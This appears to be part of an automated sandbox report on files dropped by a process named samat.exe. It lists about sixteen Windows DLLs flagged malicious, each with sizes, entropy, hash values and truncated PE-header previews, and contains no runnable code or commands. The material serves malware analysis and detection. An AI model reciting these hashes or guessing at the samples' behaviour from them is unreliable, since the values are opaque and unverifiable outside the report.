                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):13824
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.104245335186531
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:3F/1n7Guqaj0kt7/Ev9kt0Qwac6QzD8iD0QocqgI4G0S:nGXkd/EvGt9wacNDvAgI4v
                                                                                                                                                                                                                                                                                    MD5:FAD578A026F280C1AE6F787B1FA30129
                                                                                                                                                                                                                                                                                    SHA1:9A3E93818A104314E172A304C3D117B6A66BEB55
                                                                                                                                                                                                                                                                                    SHA-256:74A1FF0801F4704158684267CD8E123F83FB6334FE522C1890AC4A0926F80AB1
                                                                                                                                                                                                                                                                                    SHA-512:ACF8F5B382F3B4C07386505BBDCAF625D13BCC10AA93ED641833E3548261B0AD1063E2F59BE2FCD2AFAF3D315CB3FC5EB629CEFC168B33CFD65A3A6F1120F7FF
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...U..f.........." ......... ......P.....................................................`..........................................9.......:..d....`.......P...............p..(...@3..............................`3..8............0...............................text...H........................... ..`.rdata.......0......................@..@.data...H....@.......,..............@....pdata.......P......................@..@.rsrc........`.......2..............@..@.reloc..(....p.......4..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):17920
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.671305741258107
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:APHoDUntQj0sKhDOJ+0QPSfu6rofDjiZzgE+kbwb:VUOYsKNO466DjoUE+
                                                                                                                                                                                                                                                                                    MD5:556E6D0E5F8E4DA74C2780481105D543
                                                                                                                                                                                                                                                                                    SHA1:7A49CDEF738E9FE9CD6CD62B0F74EAD1A1774A33
                                                                                                                                                                                                                                                                                    SHA-256:247B0885CF83375211861F37B6DD1376AED5131D621EE0137A60FE7910E40F8B
                                                                                                                                                                                                                                                                                    SHA-512:28FA0CE6BDBCC5E95B80AADC284C12658EF0C2BE63421AF5627776A55050EE0EA0345E30A15B744FC2B2F5B1B1BBB61E4881F27F6E3E863EBAAEED1073F4CDA1
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...R..f.........." .....*..........P.....................................................`..........................................H......hI..d....p.......`..X...............(....A...............................A..8............@...............................text....).......*.................. ..`.rdata.......@......................@..@.data........P.......<..............@....pdata..X....`.......>..............@..@.rsrc........p.......B..............@..@.reloc..(............D..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):21504
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.878701941774916
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:EJWo4IRCGHX1KXqHGcvYHp5RYcARQOj4MSTjqgPmJD1OhgkxEv:EcIRnHX1P/YtswvaD1Rk
                                                                                                                                                                                                                                                                                    MD5:2F2655A7BBFE08D43013EDDA27E77904
                                                                                                                                                                                                                                                                                    SHA1:33D51B6C423E094BE3E34E5621E175329A0C0914
                                                                                                                                                                                                                                                                                    SHA-256:C734ABBD95EC120CB315C43021C0E1EB1BF2295AF9F1C24587334C3FCE4A5BE1
                                                                                                                                                                                                                                                                                    SHA-512:8AF99ACC969B0E560022F75A0CDCAA85D0BDEADADEACD59DD0C4500F94A5843EA0D4107789C1A613181B1F4E5252134A485EF6B1D9D83CDB5676C5FEE4D49B90
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...S..f.........." .....6... ......P.....................................................`.........................................@Z......([..d............p..................(....R...............................R..8............P...............................text....5.......6.................. ..`.rdata..x....P.......:..............@..@.data........`.......J..............@....pdata.......p.......L..............@..@.rsrc................P..............@..@.reloc..(............R..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):21504
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.881781476285865
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:EJWo4IRCGHXfKXqHGcvYHp5RYcARQOj4MSTjqgPmJD12gkxEv:EcIRnHXfP/YtswvaD1zk
                                                                                                                                                                                                                                                                                    MD5:CDE035B8AB3D046B1CE37EEE7EE91FA0
                                                                                                                                                                                                                                                                                    SHA1:4298B62ED67C8D4F731D1B33E68D7DC9A58487FF
                                                                                                                                                                                                                                                                                    SHA-256:16BEA322D994A553B293A724B57293D57DA62BC7EAF41F287956B306C13FD972
                                                                                                                                                                                                                                                                                    SHA-512:C44FDEE5A210459CE4557351E56B2D357FD4937F8EC8EACEAB842FEE29761F66C2262FCBAAC837F39C859C67FA0E23D13E0F60B3AE59BE29EB9D8ABAB0A572BB
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...S..f.........." .....6... ......P.....................................................`.........................................@Z......([..d............p..................(....R...............................R..8............P...............................text....5.......6.................. ..`.rdata..x....P.......:..............@..@.data........`.......J..............@....pdata.......p.......L..............@..@.rsrc................P..............@..@.reloc..(............R..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):26624
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.837887867708438
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:e839Cc4itui0gel9soFdkO66MlPGXmXcyYDTzks:Ns4u/FZ6nPxMLDvk
                                                                                                                                                                                                                                                                                    MD5:999D431197D7E06A30E0810F1F910B9A
                                                                                                                                                                                                                                                                                    SHA1:9BFF781221BCFFD8E55485A08627EC2A37363C96
                                                                                                                                                                                                                                                                                    SHA-256:AB242B9C9FB662C6F7CB57F7648F33983D6FA3BB0683C5D4329EC2CC51E8C875
                                                                                                                                                                                                                                                                                    SHA-512:A5DD92DD471ADB44EEFE5919EF9CA3978724E21174DF5B3A9C1F0AB462F928E5A46A460D02417DB7522F5DE3BFEED5EEE6B1EAFAF3E621722E85E72675F7096F
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...T..f.........." .....H..."......P.....................................................`..........................................k.......l..d...............................(...pd...............................d..8............`...............................text....F.......H.................. ..`.rdata.......`.......L..............@..@.data................^..............@....pdata...............`..............@..@.rsrc................d..............@..@.reloc..(............f..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):26624
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.895310340516013
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:lcX9Nf4ttui0gel9soFdkO66MlPGXmXc/vDTOvk:a38u/FZ6nPxM3DAk
                                                                                                                                                                                                                                                                                    MD5:0931ABBF3AED459B1A2138B551B1D3BB
                                                                                                                                                                                                                                                                                    SHA1:9EC0296DDAF574A89766A2EC035FC30073863AB0
                                                                                                                                                                                                                                                                                    SHA-256:1729A0DC6B80CB7A3C07372B98B10D3C6C613EA645240878E1FDE6A992FA06F1
                                                                                                                                                                                                                                                                                    SHA-512:9F970BB4D10B94F525DDDDE307C7DA5E672BBFB3A3866A34B89B56ADA99476724FD690A4396857182749294F67F36DB471A048789FB715D2A7DAF46917FC1947
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...T..f.........." .....H..."......P.....................................................`.........................................@l......(m..d...............................(....d...............................e..8............`...............................text...hG.......H.................. ..`.rdata..x....`.......L..............@..@.data................^..............@....pdata...............`..............@..@.rsrc................d..............@..@.reloc..(............f..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):12800
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.967737129255606
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:dMpWt/1nCuqaL0kt7TsEx2fiTgDZqGF0T7cqgkLgJ:k/k1Ts64DDJyBgkLg
                                                                                                                                                                                                                                                                                    MD5:5F057A380BACBA4EF59C0611549C0E02
                                                                                                                                                                                                                                                                                    SHA1:4B758D18372D71F0AA38075F073722A55B897F71
                                                                                                                                                                                                                                                                                    SHA-256:BCB14DAC6C87C24269D3E60C46B49EFFB1360F714C353318F5BBAA48C79EC290
                                                                                                                                                                                                                                                                                    SHA-512:E1C99E224745B86EE55822C1DBCB4555A11EC31B72D87B46514917EB61E0258A1C6D38C4F592969C17EB4F0F74DA04BCECA31CF1622720E95F0F20E9631792E8
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^J.6?$.6?$.6?$.?G..2?$.dJ%.4?$.}G%.5?$.6?%..?$.dJ!.<?$.dJ .>?$.dJ'.5?$..J,.7?$..J$.7?$..J..7?$..J&.7?$.Rich6?$.........................PE..d...V..f.........." ................P.....................................................`.........................................P8.......8..d....`.......P...............p..(....1...............................1..8............0...............................text............................... ..`.rdata..2....0......................@..@.data...H....@.......(..............@....pdata.......P.......*..............@..@.rsrc........`......................@..@.reloc..(....p.......0..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):13312
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.007867576025166
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:bMt/1nCuqaL0ktPH0T7fwtF4zDn2rGacqgRGd:1/kpU3Yv4zDXqgRGd
                                                                                                                                                                                                                                                                                    MD5:49BCA1B7DF076D1A550EE1B7ED3BD997
                                                                                                                                                                                                                                                                                    SHA1:47609C7102F5B1BCA16C6BAD4AE22CE0B8AEE9E9
                                                                                                                                                                                                                                                                                    SHA-256:49E15461DCB76690139E71E9359F7FCF92269DCCA78E3BFE9ACB90C6271080B2
                                                                                                                                                                                                                                                                                    SHA-512:8574D7FA133B72A4A8D1D7D9FDB61053BC88C2D238B7AC7D519BE19972B658C44EA1DE433885E3206927C75DD5D1028F74999E048AB73189585B87630F865466
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.j.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d...V..f.........." ................P.....................................................`..........................................8.......8..d....`.......P..X............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......*..............@....pdata..X....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..(....p.......2..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):15872
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.226023387740053
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:rfRKTN+HLjRskTdf4WazSTkwjEvuY2bylHDiYIgovg:mcHfRl5pauoSjy5DiE
                                                                                                                                                                                                                                                                                    MD5:CB5CFDD4241060E99118DEEC6C931CCC
                                                                                                                                                                                                                                                                                    SHA1:1E7FED96CF26C9F4730A4621CA9D18CECE3E0BCE
                                                                                                                                                                                                                                                                                    SHA-256:A8F809B6A417AF99B75EEEEA3ECD16BDA153CBDA4FFAB6E35CE1E8C884D899C4
                                                                                                                                                                                                                                                                                    SHA-512:8A89E3563C14B81353D251F9F019D8CBF07CB98F78452B8522413C7478A0D77B9ABF2134E4438145D6363CDA39721D2BAE8AD13D1CDACCBB5026619D95F931CF
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...U..f.........." ..... ... ......P.....................................................`..........................................9.......9..d....`.......P..X............p..(...p2...............................2..8............0...............................text............ .................. ..`.rdata..@....0.......$..............@..@.data........@.......4..............@....pdata..X....P.......6..............@..@.rsrc........`.......:..............@..@.reloc..(....p.......<..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):14848
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.262055670423592
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:C/ZN2eq/b04PAHH41F6fnVS0sVn+5CA5Z1cD66WGcqgFjLg:vI4IHHaQfSVnCZyDImgFjLg
                                                                                                                                                                                                                                                                                    MD5:18D2D96980802189B23893820714DA90
                                                                                                                                                                                                                                                                                    SHA1:5DEE494D25EB79038CBC2803163E2EF69E68274C
                                                                                                                                                                                                                                                                                    SHA-256:C2FD98C677436260ACB9147766258CB99780A007114AED37C87893DF1CF1A717
                                                                                                                                                                                                                                                                                    SHA-512:0317B65D8F292332C5457A6B15A77548BE5B2705F34BB8F4415046E3E778580ABD17B233E6CC2755C991247E0E65B27B5634465646715657B246483817CACEB7
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...V..f.........." ................P.....................................................`..........................................8.......9..d....`.......P..|............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......."..............@..@.data........@.......0..............@....pdata..|....P.......2..............@..@.rsrc........`.......6..............@..@.reloc..(....p.......8..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):36352
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.913843738203007
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:dspbXtHQY4ubrttQza9CHnZXQsnecAlOF0qZLAXxQI3Sya6XPpMg3Yx8MnDcCPSq:7Y44UagH6cAFCLUSYpMg3YDzPo5kG9G
                                                                                                                                                                                                                                                                                    MD5:EF472BA63FD22922CA704B1E7B95A29E
                                                                                                                                                                                                                                                                                    SHA1:700B68E7EF95514D5E94D3C6B10884E1E187ACD8
                                                                                                                                                                                                                                                                                    SHA-256:66EEF4E6E0CEEEF2C23A758BFBEDAE7C16282FC93D0A56ACAFC40E871AC3F01C
                                                                                                                                                                                                                                                                                    SHA-512:DC2060531C4153C43ABF30843BCB5F8FA082345CA1BB57F9AC8695EDDB28FF9FDA8132B6B6C67260F779D95FCADCAE2811091BCA300AB1E041FAE6CC7B50ABD8
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..P~...~...~...w.3.x...,...|...5...}...~...U...,...u...,...v...,...}.......|............._.............Rich~...................PE..d...^..f.........." .....`...0......`.....................................................`..........................................~..|...L...d...............<...............(....q...............................q..8............p..(............................text...X^.......`.................. ..`.rdata.......p.......d..............@..@.data................x..............@....pdata..<...........................@..@.rsrc...............................@..@.reloc..(...........................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):12288
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.735350805948923
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:rhsC3eqv6b0q3OQ3rHu5bc64OhD2I/p3cqgONLg:r/Hq3jHuY64OhDJJgONLg
                                                                                                                                                                                                                                                                                    MD5:3B1CE70B0193B02C437678F13A335932
                                                                                                                                                                                                                                                                                    SHA1:063BFD5A32441ED883409AAD17285CE405977D1F
                                                                                                                                                                                                                                                                                    SHA-256:EB2950B6A2185E87C5318B55132DFE5774A5A579259AB50A7935A7FB143EA7B1
                                                                                                                                                                                                                                                                                    SHA-512:0E02187F17DFCFD323F2F0E62FBFE35F326DCF9F119FC8B15066AFAEEE4EB7078184BC85D571B555E9E67A2DD909EC12D8A67E3D075E9B1283813EF274E05C0D
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^:.6?T.6?T.6?T.?G..2?T.dJU.4?T.}GU.5?T.6?U..?T.dJQ.<?T.dJP.>?T.dJW.5?T..J\.7?T..JT.7?T..J..7?T..JV.7?T.Rich6?T.........................PE..d...Z..f.........." ................P.....................................................`..........................................8..d....8..d....`.......P..4............p..(....1...............................1..8............0...............................text...H........................... ..`.rdata..0....0......................@..@.data........@.......&..............@....pdata..4....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..(....p......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):22528
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.705606408072877
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:19BcRxBmau38CYIl9bhgIW0mvufueNr359/tjGGDEFSegqrA:NcRy38J+9dmvufFtaGDV
                                                                                                                                                                                                                                                                                    MD5:FF33C306434DEC51D39C7BF1663E25DA
                                                                                                                                                                                                                                                                                    SHA1:665FCF47501F1481534597C1EAC2A52886EF0526
                                                                                                                                                                                                                                                                                    SHA-256:D0E3B6A2D0E073B2D9F0FCDB051727007943A17A4CA966D75EBA37BECDBA6152
                                                                                                                                                                                                                                                                                    SHA-512:66A909DC9C3B7BD4050AA507CD89B0B3A661C85D33C881522EC9568744953B698722C1CBFF093F9CBCD6119BD527FECAB05A67F2E32EC479BE47AFFA4377362C
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...\..f.........." .....6...$......P.....................................................`.........................................`Y......`Z..d............p..................(....R..............................0R..8............P...............................text...(5.......6.................. ..`.rdata.......P.......:..............@..@.data........`.......J..............@....pdata.......p.......P..............@..@.rsrc................T..............@..@.reloc..(............V..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):70656
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.0189903352673655
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:Jfju4GgRMgWWnEDZiECgd/iwOXUQdbhov0Clb8Cx4hpK8ithLFIDullRPwDHxXOa:pXRMgWiEDZiECgd/iwOXUQdbhov0ClbU
                                                                                                                                                                                                                                                                                    MD5:F267BF4256F4105DAD0D3E59023011ED
                                                                                                                                                                                                                                                                                    SHA1:9BC6CA0F375CE49D5787C909D290C07302F58DA6
                                                                                                                                                                                                                                                                                    SHA-256:1DDE8BE64164FF96B2BAB88291042EB39197D118422BEE56EB2846E7A2D2F010
                                                                                                                                                                                                                                                                                    SHA-512:A335AF4DBF1658556ED5DC13EE741419446F7DAEC6BD2688B626A803FA5DD76463D6367C224E0B79B17193735E2C74BA417C26822DAEEF05AC3BAB1588E2DE83
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..P~...~...~...w.3.x...,...|...5...}...~...U...,...u...,...v...,...}.......|............._.............Rich~...................PE..d...\..f.........." .........8......`........................................P............`.............................................0.......d....0....... ..$............@..(.......................................8............................................text...8........................... ..`.rdata..............................@..@.data...............................@....pdata..$.... ......................@..@.rsrc........0......................@..@.reloc..(....@......................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):770560
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.613224993327352
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12288:XtIrHoxJ8gf1266y8IXhJvCKAmqVLzcrZgYIMGv1iLD9yQvG6h:XtIrHoxJFf1p34hcrn5Go9yQO6
                                                                                                                                                                                                                                                                                    MD5:1EFD7F7CB1C277416011DE6F09C355AF
                                                                                                                                                                                                                                                                                    SHA1:C0F97652AC2703C325AB9F20826A6F84C63532F2
                                                                                                                                                                                                                                                                                    SHA-256:AB45FA80A68DB1635D41DC1A4AAD980E6716DAC8C1778CB5F30CDB013B7DF6E6
                                                                                                                                                                                                                                                                                    SHA-512:2EC4B88A1957733043BBD63CEAA6F5643D446DB607B3267FAD1EC611E6B0AF697056598AAC2AE5D44AB2B9396811D183C32BCE5A0FF34E583193A417D1C5226B
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........s.. .. .. ... .. ..!.. ..!.. .. .. ..!.. ..!.. ..!.. \..!.. \..!.. \.r .. \..!.. Rich.. ................PE..d...[..f.........." ................`.....................................................`.............................................h.......d...............................0......................................8...............(............................text............................... ..`.rdata..............................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..0...........................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):26112
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.8551858881598795
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:BczadRwoF2MZ81n0XTyMCYIl9bhgIW0mv8aeadRcwRwftjGLD2pRQNgQQ77k:2udRf2MuMJ+9dmv8aea34taLDcfQ
                                                                                                                                                                                                                                                                                    MD5:C5FB377F736ED731B5578F57BB765F7A
                                                                                                                                                                                                                                                                                    SHA1:5BA51E11F4DE1CAEDEBA0F7D4D10EC62EC109E01
                                                                                                                                                                                                                                                                                    SHA-256:32073DF3D5C85ABCE7D370D6E341EF163A8350F6A9EDC775C39A23856CCFDD53
                                                                                                                                                                                                                                                                                    SHA-512:D361BCDAF2C700D5A4AC956D96E00961432C05A1B692FC870DB53A90F233A6D24AA0C3BE99E40BD8E5B7C6C1B2BCDCDCFC545292EF321486FFC71C5EA7203E6A
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
